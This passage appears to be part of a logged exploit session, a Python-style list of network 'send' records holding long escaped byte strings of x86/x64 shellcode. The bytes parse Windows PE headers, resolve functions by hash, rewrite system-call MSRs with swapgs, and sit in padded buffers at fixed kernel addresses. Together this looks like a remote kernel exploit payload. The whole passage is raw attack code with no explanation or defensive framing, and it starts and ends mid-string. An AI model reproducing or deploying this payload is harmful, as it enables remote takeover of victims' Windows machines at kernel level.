\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 8, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\